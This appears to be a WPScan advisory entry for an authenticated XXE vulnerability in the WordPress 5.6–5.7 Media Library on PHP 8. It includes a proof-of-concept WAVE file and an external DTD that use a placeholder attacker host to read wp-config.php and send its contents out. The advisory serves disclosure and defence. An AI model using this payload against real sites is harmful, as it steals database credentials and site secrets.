WordPress Vulnerabilities
WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8
Description
A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above.
This particular vulnerability could be triggered when parsing WAVE audio files.
Proof of Concept
payload.wav: RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd"> %sp; %param1; ]> <r>&exfil;</r>> xxe.dtd: <!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
Affects WordPress
Fixed in WordPress 5.7.1 References
CVE
YouTube Video
Classification
Type
XXE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
SonarSource
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-15 (about 3 years ago)
Added
2021-04-15 (about 3 years ago)
Last Updated
2021-05-19 (about 2 years ago)
WPScan 